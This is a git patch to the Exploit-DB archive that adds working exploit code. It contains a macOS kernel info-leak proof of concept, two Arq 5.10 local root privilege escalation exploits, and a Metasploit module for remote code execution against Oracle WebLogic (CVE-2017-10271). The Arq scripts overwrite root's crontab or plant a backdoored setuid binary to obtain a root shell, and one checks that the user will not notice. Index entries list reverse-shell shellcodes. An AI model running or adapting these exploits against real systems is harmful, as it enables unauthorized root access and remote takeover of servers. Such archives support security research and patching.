From ef96c0511bf7e43703e613053857d0d3ef1bf22f Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Tue, 30 Jan 2018 05:01:49 +0000 Subject: [PATCH] DB: 2018-01-30 4 changes to exploits/shellcodes macOS - 'sysctl_vfs_generic_conf' Stack Leak Through Struct Padding Arq 5.10 - Local Privilege Escalation (1) Arq 5.10 - Local Privilege Escalation (2) Oracle WebLogic - wls-wsat Component Deserialization Remote Code Execution (Metasploit) Linux/ARM - Reverse TCP (192.168.1.1:4444/TCP) Shell (/bin/sh) Null Free Shellcode (80 bytes) Linux/ARM - Reverse TCP (192.168.1.1:4444/TCP) Shell (/bin/sh)+ Null-Free Shellcode (80 bytes) --- exploits/macos/dos/43923.c | 134 ++++++++++++++ exploits/macos/local/43925.rb | 286 ++++++++++++++++++++++++++++++ exploits/macos/local/43926.sh | 112 ++++++++++++ exploits/multiple/remote/43924.rb | 190 ++++++++++++++++++++ files_exploits.csv | 4 + files_shellcodes.csv | 2 +- 6 files changed, 727 insertions(+), 1 deletion(-) create mode 100644 exploits/macos/dos/43923.c create mode 100755 exploits/macos/local/43925.rb create mode 100755 exploits/macos/local/43926.sh create mode 100755 exploits/multiple/remote/43924.rb diff --git a/exploits/macos/dos/43923.c b/exploits/macos/dos/43923.c new file mode 100644 index 000000000..dacdf4b8d --- /dev/null +++ b/exploits/macos/dos/43923.c @@ -0,0 +1,134 @@ +/* +The sysctls vfs.generic.conf.* are handled by sysctl_vfs_generic_conf(), which is implemented as follows: + +static int +sysctl_vfs_generic_conf SYSCTL_HANDLER_ARGS +{ + int *name, namelen; + struct vfstable *vfsp; + struct vfsconf vfsc; + + (void)oidp; + name = arg1; + namelen = arg2; + + [check for namelen==1] + + mount_list_lock(); + for (vfsp = vfsconf; vfsp; vfsp = vfsp->vfc_next) + if (vfsp->vfc_typenum == name[0]) + break; + + if (vfsp == NULL) { + mount_list_unlock(); + return (ENOTSUP); + } + + vfsc.vfc_reserved1 = 0; + bcopy(vfsp->vfc_name, vfsc.vfc_name, sizeof(vfsc.vfc_name)); + vfsc.vfc_typenum = vfsp->vfc_typenum; + vfsc.vfc_refcount = vfsp->vfc_refcount; + vfsc.vfc_flags = vfsp->vfc_flags; + vfsc.vfc_reserved2 = 0; + vfsc.vfc_reserved3 = 0; + + mount_list_unlock(); + return (SYSCTL_OUT(req, &vfsc, sizeof(struct vfsconf))); +} + +`struct vfsconf` is defined as follows: + +struct vfsconf { + uint32_t vfc_reserved1; /* opaque + char vfc_name[MFSNAMELEN]; /* filesystem type name + int vfc_typenum; /* historic filesystem type number + int vfc_refcount; /* number mounted of this type + int vfc_flags; /* permanent flags + uint32_t vfc_reserved2; /* opaque + uint32_t vfc_reserved3; /* opaque +}; + +`MFSNAMELEN` is defined as follows: + +#define MFSNAMELEN 15 /* length of fs type name, not inc. null +#define MFSTYPENAMELEN 16 /* length of fs type name including null + +This means that one byte of uninitialized padding exists between `vfc_name` and `vfc_typenum`. + + +This issue was discovered using an AFL-based fuzzer, loosely based on TriforceAFL. This is the diff of two runs over the fuzzer queue with different stack poison values (0xcc and 0xdd): + +--- traces_cc_/id:018803,src:012522,op:havoc,rep:2,+cov 2017-11-06 13:08:41.486752415 +0100 ++++ traces_dd_/id:018803,src:012522,op:havoc,rep:2,+cov 2017-11-06 13:08:56.583413293 +0100 +@@ -1,19 +1,19 @@ + loaded 72 bytes fuzzdata + USER READ: addr 0xffffffffffffffff, size 8, value 0x00000600020000ca + USER READ: addr 0xffffffffffffffff, size 8, value 0x0000000000000003 + USER READ: addr 0xffffffffffffffff, size 8, value 0x0000000000000004 + USER READ: addr 0xffffffffffffffff, size 8, value 0x0000000000060000 + USER READ: addr 0xffffffffffffffff, size 8, value 0x00ea800500000010 + USER READ: addr 0xffffffffffffffff, size 8, value 0x0000000000010003 + USER READ: addr 0xffffffffffffffff, size 8, value 0x0000000000000000 + syscall(rax=0x600020000ca, args=[0x3, 0x4, 0x60000, 0xea800500000010, 0x10003, 0x0]); rsp=0x7ffee418eda8 + USER READ: addr 0x3, size 8, value 0x0000000000000003 + USER READ: addr 0xb, size 8, value 0x0000001700000002 + USER WRITE: addr 0x60000, size 8, value 0x0073666800000000 + USER WRITE: addr 0x60008, size 8, value 0x0000000000000000 +-USER WRITE: addr 0x60010, size 8, value 0x00000017cc000000 ++USER WRITE: addr 0x60010, size 8, value 0x00000017dd000000 + USER WRITE: addr 0x60018, size 8, value 0x0000100000000001 + USER WRITE: addr 0x60020, size 8, value 0x0000000000000000 + sysret + OUT OF FUZZER INPUT DATA - REWINDING + REWIND! (trigger_exception=0x10006; cycles=7) + +Verified on a Macmini7,1 running macOS 10.13 (17A405), Darwin 17.0.0: + +$ cat sysctl_conf_test.c +*/ + +#include +#include +#include +#include +#include +#include + +struct vfsconf_withpad { + int reserved1; + char name[15]; + unsigned char pad1; + int typenum; + int refcount; + int flags; + int reserved2; + int reserved3; +}; + +int main(void) { + int name[] = { CTL_VFS, VFS_GENERIC, VFS_CONF, 0x17 }; + static struct vfsconf_withpad conf; + size_t outlen = sizeof(conf); + if (sysctl(name, sizeof(name)/sizeof(name[0]), &conf, &outlen, NULL, 0)) + err(1, "sysctl"); + if (outlen != sizeof(conf)) + errx(1, "outlen != sizeof(conf)"); + printf("name=%.15s pad1=0x%02hhx typenum=%d refcount=%d flags=%d\n", + conf.name, conf.pad1, conf.typenum, conf.refcount, conf.flags); +} + +/* +$ gcc -o sysctl_conf_test sysctl_conf_test.c -Wall +$ ./sysctl_conf_test +name=hfs pad1=0x24 typenum=23 refcount=2 flags=4096 +$ ./sysctl_conf_test +name=hfs pad1=0x26 typenum=23 refcount=2 flags=4096 +$ ./sysctl_conf_test +name=hfs pad1=0x24 typenum=23 refcount=2 flags=4096 +$ ./sysctl_conf_test +name=hfs pad1=0x23 typenum=23 refcount=2 flags=4096 +$ ./sysctl_conf_test +name=hfs pad1=0x23 typenum=23 refcount=2 flags=4096 +$ ./sysctl_conf_test +name=hfs pad1=0x26 typenum=23 refcount=2 flags=4096 +*/ \ No newline at end of file diff --git a/exploits/macos/local/43925.rb b/exploits/macos/local/43925.rb new file mode 100755 index 000000000..a60abebae --- /dev/null +++ b/exploits/macos/local/43925.rb @@ -0,0 +1,286 @@ +#!/usr/bin/env ruby + +################################################################# +###### Arq <= 5.10 local root privilege escalation exploit ###### +###### by m4rkw - https://m4.rkw.io/blog.html ###### +################################################################# +###### ###### +###### Usage: ###### +###### ###### +###### ./arq_5.10.rb # stage 1 ###### +###### ###### +###### (wait for next Arq backup run) ###### +###### ###### +###### ./arq_5.10.rb # stage 2 ###### +###### ###### +###### if you know the HMAC from a previous run: ###### +###### ###### +###### ./arq_5.10.rb stage2 ###### +###### ###### +################################################################# +###### USE AT YOUR OWN RISK - THIS WILL OVERWRITE THE ROOT ###### +###### USER'S CRONTAB! ###### +################################################################# + +$binary_target = "/tmp/arq_510_exp" + +class Arq510PrivEsc + def initialize(args) + @payload_file = ".arq_510_exp_payload" + @hmac_file = ENV["HOME"] + "/.arq_510_exp_hmac" + @backup_file = ENV["HOME"] + "/" + @payload_file + + @target = shell("ls -1t ~/Library/Arq/Cache.noindex/ |head -n1") + @bucket_uuid = shell("grep 'writing head blob key' " + + "~/Library/Logs/arqcommitter/* |tail -n1 |sed 's/^.*key //' |cut -d " + + "' ' -f4") + @computer_uuid = shell("cat ~/Library/Arq/config/app_config.plist |grep " + + "-A1 #{@target} |tail -n1 |xargs |cut -d '>' -f2 |cut -d '<' -f1") + @backup_endpoint = shell("cat ~/Library/Arq/config/targets/#{@target}.target " + + "|grep -A1 '>endpointDescription<' |tail -n1 |xargs |cut -d '>' -f2 " + + "| cut -d '<' -f1") + @latest_backup_set = latest_backup_set + + puts " target: #{@target}" + puts " bucket uuid: #{@bucket_uuid}" + puts " computer uuid: #{@computer_uuid}" + puts "backup endpoint: #{@backup_endpoint}" + puts " latest backup: #{@latest_backup_set}\n\n" + + if args.length >0 + method = args.shift + if respond_to? method + send method, *args + end + else + if File.exist? @hmac_file + method = :stage2 + else + method = :stage1 + end + + send method + end + end + + def shell(command) + `#{command}`.chomp + end + + def latest_backup_set + shell("grep 'writing head blob' ~/Library/Logs/arqcommitter/* |tail -n1 " + + "|sed 's/.*key //' |cut -d ' ' -f1") + end + + def scan_hmac_list + packsets_path = shell("find ~/Library/Arq/ -type d -name packsets") + hmac = {} + + shell("strings #{packsets_path}/*-trees.db").split("\n").each do |line| + if (m = line.match(/[0-9a-fA-F]+/)) and m[0].length == 40 + if !hmac.include? m[0] + hmac[m[0]] = 1 + end + end + end + + hmac + end + + def stage1 + print "building HMAC cache... " + + hmac = scan_hmac_list + + File.open(@hmac_file, "w") do |f| + f.write(@latest_backup_set + "\n" + hmac.keys.join("\n")) + end + + puts "done - stored at #{@hmac_file}" + + print "dropping backup file... " + + File.open(@backup_file, "w") do |f| + f.write("* * * * * /usr/sbin/chown root:wheel #{$binary_target} &&" + + "/bin/chmod 4755 #{$binary_target}\n") + end + + puts "done" + puts "wait for the next backup run to complete and then run again" + end + + def stage2(target_hmac=nil) + if !target_hmac + if !File.exist? @hmac_file + raise "hmac list not found." + end + + print "loading HMAC cache... " + + data = File.read(@hmac_file).split("\n") + + puts "done" + + initial_backup_set = data.shift + + if initial_backup_set == @latest_backup_set + puts "no new backup created yet" + exit 1 + end + + hmac = {} + data.each do |h| + hmac[h] = 1 + end + + hmac_targets = [] + + print "scanning for HMAC targets... " + + scan_hmac_list.keys.each do |h| + if !hmac[h] + hmac_targets.push h + end + end + + puts "done" + + if hmac_targets.length == 0 + puts "no HMAC targets, unable to continue." + exit 0 + end + + puts "found #{hmac_targets.length} HMAC targets" + + hmac_targets.each do |hmac| + attempt_exploit(hmac) + end + else + attempt_exploit(target_hmac) + end + end + + def build_payload(hmac) + d = "\x01\x00\x00\x00\x00\x00\x00\x00" + e = "\x00\x00\x00\x00\x03" + + @overwrite_path = '/var/at/tabs/root' + + plist = " + + + Endpoint + #{@backup_endpoint} + BucketUUID + #{@bucket_uuid} + BucketName + / + ComputerUUID + #{@computer_uuid} + LocalPath + / + LocalMountPoint + / + StorageType + 1 + SkipDuringBackup + + ExcludeItemsWithTimeMachineExcludeMetadataFlag + + +" + + hex = plist.length.to_s(16).rjust(4,'0') + plist_size = (hex[0,2].to_i(16).chr + hex[2,2].to_i(16).chr) + + pfl = @payload_file.length.chr + opl = @overwrite_path.length.chr + bel = @backup_endpoint.length.chr + + payload = sprintf( + ( + "%s\$%s%s%s%s\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00" + + "\x00\x00\x00\x00\x00\x09\x00\x00\x02\xd0\x96\x82\xef\xd8\x00\x00\x00" + + "\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x08\x30" + + "\x2e\x30\x30\x30\x30\x30\x30\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + + "\x00\x00\x00\x00\x00\x00\x00\x00\x00%s%s%s\x28%s\x01\x00\x00\x00%s" + + "\x00\x00\x00%s%s%s\x00\x00\x00\x16\x00\x00\x00\x02%s\x28%s\x01\x00" + + "\x00\x00%s\x00\x00\x00%s%s%s\x00\x00\x00\x00\x00\x00\x01\xf5\x00\x00" + + "\x00\x00\x00\x00\x00\x14\x00%s%s%s\x00\x00\x00\x03%s\x0a" + ).force_encoding('ASCII-8BIT'), + d, @target, + d, bel, @backup_endpoint, + plist_size, plist, + d, @latest_backup_set, + d, d, pfl, @payload_file, + d, hmac, + d, d, pfl, @payload_file, + d, opl, @overwrite_path, + e * 10 + ) + + return payload + end + + def attempt_exploit(hmac) + print "trying HMAC: #{hmac} ... " + + File.open("/tmp/.arq_exp_510_payload","w") do |f| + f.write(build_payload(hmac)) + end + + output = shell("cat /tmp/.arq_exp_510_payload | " + + "/Applications/Arq.app/Contents/Resources/standardrestorer 2>/dev/null") + + File.delete("/tmp/.arq_exp_510_payload") + + if output.include?("Creating directory structure") and !output.include?("failed") + puts "SUCCESS" + + print "compiling shell invoker... " + + shellcode = "#include \nint main()\n{ setuid(0);setgid(0);" + + "execl(\"/bin/bash\",\"bash\",\"-c\",\"rm -f #{$binary_target};rm -f " + + "/var/at/tabs/root;/bin/bash\","+ "NULL);return 0; }" + + IO.popen("gcc -xc -o #{$binary_target} -", mode="r+") do |io| + io.write(shellcode) + io.close + end + + puts "done" + + print "waiting for root+s... " + + timeout = 61 + i = 0 + stop = false + + while i < timeout + s = File.stat($binary_target) + + if s.mode == 0104755 and s.uid == 0 + puts "\n" + exec($binary_target) + end + + sleep 1 + i += 1 + + if !stop + left = 60 - Time.now.strftime("%S").to_i + left == 1 && stop = true + + print "#{left} " + end + end + + puts "exploit failed" + exit 0 + else + puts "FAIL" + end + end +end + +Arq510PrivEsc.new(ARGV) \ No newline at end of file diff --git a/exploits/macos/local/43926.sh b/exploits/macos/local/43926.sh new file mode 100755 index 000000000..e15185659 --- /dev/null +++ b/exploits/macos/local/43926.sh @@ -0,0 +1,112 @@ +#!/bin/bash + +################################################################# +###### Arq <= 5.10 local root privilege escalation exploit ###### +###### by m4rkw - https://m4.rkw.io/blog.html ###### +################################################################# + +app="/Applications/Arq.app" +res="$app/Contents/Resources" +lires="$app/Contents/Library/LoginItems/Arq Agent.app/Contents/Resources" + +vuln=`ls -la "$lires/arq_updater" |grep '\-rws' |grep root` + +if [ "$vuln" == "" ] ; then + echo "Not vulnerable - auto-updates not enabled." + exit 1 +fi + +if [ "$1" != "-f" ] ; then + latest_logfile="`ls -1t ~/Library/Logs/Arq\ Agent/ |head -n1`" + status_line="`egrep -i 'backup session.*?(ended|started)' \ + \"$HOME/Library/Logs/Arq Agent/$latest_logfile\" |tail -n1 |grep -i started`" + + if [ "$status_line" != "" ] ; then + echo -n "WARNING: backup in progress, the user will very " + echo "likely notice if we exploit now!" + echo "use -f to override." + exit 1 + fi +fi + +owd="`pwd`" + +if [ -e ~/.arq_510_privesc_exp ] ; then + rm -rf ~/.arq_510_privesc_exp +fi + +mkdir ~/.arq_510_privesc_exp +cd ~/.arq_510_privesc_exp + +echo "copying application..." + +cp -R /Applications/Arq.app . + +echo "compiling payloads..." + +cat > payload.sh < shell.c < +#include +int main(int ac, char *av[]) +{ + if (ac > 1 && strcmp(av[1], "boom") == 0) { + setuid(0); + setgid(0); + execl( + "/bin/bash","bash","-c","mv -f $res/standardrestorer.orig $res/standardr" + "estorer;chmod 4755 $res/standardrestorer;$HOME/.arq_510_privesc_exp/pay" + "load.sh;/bin/bash", NULL + ); + } + return 0; +} +EOF +mv Arq.app/Contents/Resources/standardrestorer \ + Arq.app/Contents/Resources/standardrestorer.orig +gcc -o Arq.app/Contents/Resources/standardrestorer shell.c +rm -f shell.c + +payload_size=`stat Arq.app/Contents/Resources/standardrestorer |cut -d ' ' -f8` +GID=`id |sed 's/^.*gid=//' |cut -d '(' -f1` +cwd=`pwd` + +echo "creating backdoored Arq.zip..." +zip -1r Arq.zip Arq.app/ 1>/dev/null 2>/dev/null +rm -rf Arq.app/ + +echo "executing upgrade..." + +"$lires/arq_updater" installupdate file://$cwd/Arq.zip $UID $GID YES \ + 1>/dev/null 2>/dev/null + +echo "waiting..." +while : +do + ac_size=`stat $res/standardrestorer 2>/dev/null |cut -d ' ' -f8` + x=`ls -la $res/standardrestorer |grep -- '-rwsr-xr-x' |grep root` + + if [ "$ac_size" == "$payload_size" -a "$x" != "" ] ; then + cd "$owd" + $res/standardrestorer boom + exit 0 + fi + sleep 0.2 +done \ No newline at end of file diff --git a/exploits/multiple/remote/43924.rb b/exploits/multiple/remote/43924.rb new file mode 100755 index 000000000..6eae7b885 --- /dev/null +++ b/exploits/multiple/remote/43924.rb @@ -0,0 +1,190 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + # include Msf::Exploit::Remote::HttpServer + + def initialize(info = {}) + super( + update_info( + info, + 'Name' => 'Oracle WebLogic wls-wsat Component Deserialization RCE', + 'Description' => %q( + The Oracle WebLogic WLS WSAT Component is vulnerable to a XML Deserialization + remote code execution vulnerability. Supported versions that are affected are + 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0. Discovered by Alexey Tyurin + of ERPScan and Federico Dotta of Media Service. Please note that SRVHOST, SRVPORT, + HTTP_DELAY, URIPATH and related HTTP Server variables are only used when executing a check + and will not be used when executing the exploit itself. + ), + 'License' => MSF_LICENSE, + 'Author' => [ + 'Kevin Kirsche ', # Metasploit module + 'Luffin', # Proof of Concept + 'Alexey Tyurin', 'Federico Dotta' # Vulnerability Discovery + ], + 'References' => + [ + ['URL', 'https://www.oracle.com/technetwork/topics/security/cpuoct2017-3236626.html'], # Security Bulletin + ['URL', 'https://github.com/Luffin/CVE-2017-10271'], # Proof-of-Concept + ['URL', 'https://github.com/kkirsche/CVE-2017-10271'], # Standalone Exploit + ['CVE', '2017-10271'], + ['EDB', '43458'] + ], + 'Platform' => %w{ win unix }, + 'Arch' => [ ARCH_CMD ], + 'Targets' => + [ + [ 'Windows Command payload', { 'Arch' => ARCH_CMD, 'Platform' => 'win' } ], + [ 'Unix Command payload', { 'Arch' => ARCH_CMD, 'Platform' => 'unix' } ] + ], + 'DisclosureDate' => "Oct 19 2017", + # Note that this is by index, rather than name. It's generally easiest + # just to put the default at the beginning of the list and skip this + # entirely. + 'DefaultTarget' => 0 + ) + ) + + register_options([ + OptString.new('TARGETURI', [true, 'The base path to the WebLogic WSAT endpoint', '/wls-wsat/CoordinatorPortType']), + OptPort.new('RPORT', [true, "The remote port that the WebLogic WSAT endpoint listens on", 7001]), + OptFloat.new('TIMEOUT', [true, "The timeout value of requests to RHOST", 20.0]), + # OptInt.new('HTTP_DELAY', [true, 'Time that the HTTP Server will wait for the check payload', 10]) + ]) + end + + def cmd_base + if target['Platform'] == 'win' + return 'cmd' + else + return '/bin/sh' + end + end + + def cmd_opt + if target['Platform'] == 'win' + return '/c' + else + return '-c' + end + end + + + # + # This generates a XML payload that will execute the desired payload on the RHOST + # + def exploit_process_builder_payload + # Generate a payload which will execute on a *nix machine using /bin/sh + xml = %Q{ + + + + + + + #{cmd_base} + + + #{cmd_opt} + + + #{payload.encoded.encode(xml: :text)} + + + + + + + + +} + end + + # + # This builds a XML payload that will generate a HTTP GET request to our SRVHOST + # from the target machine. + # + def check_process_builder_payload + xml = %Q{ + + + + + #{get_uri.encode(xml: :text)} + + + + + + + + +} + end + + # + # In the event that a 'check' host responds, we should respond randomly so that we don't clog up + # the logs too much with a no response error or similar. + # + def on_request_uri(cli, request) + random_content = '

'+Rex::Text.rand_text_alphanumeric(20)+'

' + send_response(cli, random_content) + + @received_request = true + end + + # + # The exploit method connects to the remote service and sends a randomly generated string + # encapsulated within a SOAP XML body. This will start an HTTP server for us to receive + # the response from. This is based off of the exploit technique from + # exploits/windows/novell/netiq_pum_eval.rb + # + # This doesn't work as is because MSF cannot mix HttpServer and HttpClient + # at the time of authoring this + # + # def check + # start_service + # + # print_status('Sending the check payload...') + # res = send_request_cgi({ + # 'method' => 'POST', + # 'uri' => normalize_uri(target_uri.path), + # 'data' => check_process_builder_payload, + # 'ctype' => 'text/xml;charset=UTF-8' + # }, datastore['TIMEOUT']) + # + # print_status("Waiting #{datastore['HTTP_DELAY']} seconds to see if the target requests our URI...") + # + # waited = 0 + # until @received_request + # sleep 1 + # waited += 1 + # if waited > datastore['HTTP_DELAY'] + # stop_service + # return Exploit::CheckCode::Safe + # end + # end + # + # stop_service + # return Exploit::CheckCode::Vulnerable + # end + + # + # The exploit method connects to the remote service and sends the specified payload + # encapsulated within a SOAP XML body. + # + def exploit + send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path), + 'data' => exploit_process_builder_payload, + 'ctype' => 'text/xml;charset=UTF-8' + }, datastore['TIMEOUT']) + end +end \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 71a8600e2..b384f2901 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -5481,6 +5481,7 @@ id,file,description,date,author,type,platform,port 41639,exploits/windows/dos/41639.txt,"ExtraPuTTY 0.29-RC2 - Denial of Service",2017-03-20,hyp3rlinx,dos,windows, 43903,exploits/multiple/dos/43903.txt,"Artifex MuJS 1.0.2 - Denial of Service",2018-01-28,"Andrea Sindoni",dos,multiple, 43904,exploits/multiple/dos/43904.txt,"Artifex MuJS 1.0.2 - Integer Overflow",2018-01-28,"Andrea Sindoni",dos,multiple, +43923,exploits/macos/dos/43923.c,"macOS - 'sysctl_vfs_generic_conf' Stack Leak Through Struct Padding",2018-01-29,"Google Security Research",dos,macos, 41643,exploits/hardware/dos/41643.txt,"Google Nest Cam 5.2.1
 - Buffer Overflow Conditions Over Bluetooth LE",2017-03-20,"Jason Doyle",dos,hardware, 41645,exploits/windows/dos/41645.txt,"Microsoft Windows Kernel - Registry Hive Loading Crashes in nt!nt!HvpGetBinMemAlloc / nt!ExpFindAndRemoveTagBigPages (MS17-017)",2017-03-20,"Google Security Research",dos,windows, 41646,exploits/windows/dos/41646.txt,"Microsoft Windows - Uniscribe Font Processing Out-of-Bounds Read in usp10!otlChainRuleSetTable::rule (MS17-011)",2017-03-20,"Google Security Research",dos,windows, @@ -9299,6 +9300,8 @@ id,file,description,date,author,type,platform,port 43499,exploits/multiple/local/43499.txt,"Parity Browser < 1.6.10 - Bypass Same Origin Policy",2018-01-10,tintinweb,local,multiple, 43500,exploits/multiple/local/43500.txt,"Python smtplib 2.7.11 / 3.4.4 / 3.5.1 - Man In The Middle StartTLS Stripping",2016-07-03,tintinweb,local,multiple, 43775,exploits/linux/local/43775.c,"glibc - 'getcwd()' Local Privilege Escalation",2018-01-16,halfdog,local,linux, +43925,exploits/macos/local/43925.rb,"Arq 5.10 - Local Privilege Escalation (1)",2018-01-29,"Mark Wadham",local,macos, +43926,exploits/macos/local/43926.sh,"Arq 5.10 - Local Privilege Escalation (2)",2018-01-29,"Mark Wadham",local,macos, 41675,exploits/android/local/41675.rb,"Google Android 4.2 Browser and WebView - 'addJavascriptInterface' Code Execution (Metasploit)",2012-12-21,Metasploit,local,android, 41683,exploits/multiple/local/41683.rb,"Mozilla Firefox < 17.0.1 - Flash Privileged Code Injection (Metasploit)",2013-01-08,Metasploit,local,multiple, 41700,exploits/windows/local/41700.rb,"Sun Java Web Start Plugin - Command Line Argument Injection (Metasploit)",2010-04-09,Metasploit,local,windows, @@ -15969,6 +15972,7 @@ id,file,description,date,author,type,platform,port 41638,exploits/windows/remote/41638.txt,"HttpServer 1.0 - Directory Traversal",2017-03-19,malwrforensics,remote,windows, 43902,exploits/multiple/remote/43902.py,"BMC BladeLogic 8.3.00.64 - Remote Command Execution",2018-01-26,"Paul Taylor",remote,multiple, 43920,exploits/linux/remote/43920.py,"Trend Micro Threat Discovery Appliance 2.6.1062r1 - 'dlp_policy_upload.cgi' Remote Code Execution",2018-01-28,mr_me,remote,linux, +43924,exploits/multiple/remote/43924.rb,"Oracle WebLogic - wls-wsat Component Deserialization Remote Code Execution (Metasploit)",2018-01-29,Metasploit,remote,multiple, 41666,exploits/windows/remote/41666.py,"Disk Sorter Enterprise 9.5.12 - 'GET' Remote Buffer Overflow (SEH)",2017-03-22,"Daniel Teixeira",remote,windows, 41672,exploits/windows/remote/41672.rb,"SysGauge 1.5.18 - SMTP Validation Buffer Overflow (Metasploit)",2017-02-28,Metasploit,remote,windows, 41679,exploits/linux/remote/41679.rb,"Ceragon FibeAir IP-10 - SSH Private Key Exposure (Metasploit)",2015-04-01,Metasploit,remote,linux,22 diff --git a/files_shellcodes.csv b/files_shellcodes.csv index 1fd51c5cf..bed20f689 100644 --- a/files_shellcodes.csv +++ b/files_shellcodes.csv @@ -836,7 +836,7 @@ id,file,description,date,author,type,platform 41635,shellcodes/linux_x86/41635.txt,"Linux/x86 - Read /etc/passwd Shellcode (54 bytes)",2017-03-19,WangYihang,shellcode,linux_x86 43734,shellcodes/linux_x86/43734.c,"Linux/x86 - Insertion Decoder + Null-Free Shellcode (33+ bytes)",2013-01-01,"Geyslan G. Bem",shellcode,linux_x86 43910,shellcodes/linux_x86/43910.c,"Linux/x86 - Egghunter Shellcode (12 Bytes)",2018-01-28,"Nipun Jaswal",shellcode,linux_x86 -43921,shellcodes/arm/43921.asm,"Linux/ARM - Reverse TCP (192.168.1.1:4444/TCP) Shell (/bin/sh) Null Free Shellcode (80 bytes)",2018-01-28,rtmcx,shellcode,arm +43921,shellcodes/arm/43921.asm,"Linux/ARM - Reverse TCP (192.168.1.1:4444/TCP) Shell (/bin/sh)+ Null-Free Shellcode (80 bytes)",2018-01-28,rtmcx,shellcode,arm 42295,shellcodes/linux_x86/42295.c,"Linux/x86 - Reverse TCP (127.1.1.1:11111/TCP) Shell + Null-Free Shellcode (67 bytes)",2013-01-01,"Geyslan G. Bem",shellcode,linux_x86 41723,shellcodes/linux_x86/41723.c,"Linux/x86 - Reverse TCP (192.168.3.119:54321/TCP) Shell (/bin/bash) Shellcode (110 bytes)",2017-03-24,JR0ch17,shellcode,linux_x86 41750,shellcodes/linux_x86-64/41750.asm,"Linux/x64 - execve(/bin/sh) Shellcode (21 bytes)",2017-03-28,WangYihang,shellcode,linux_x86-64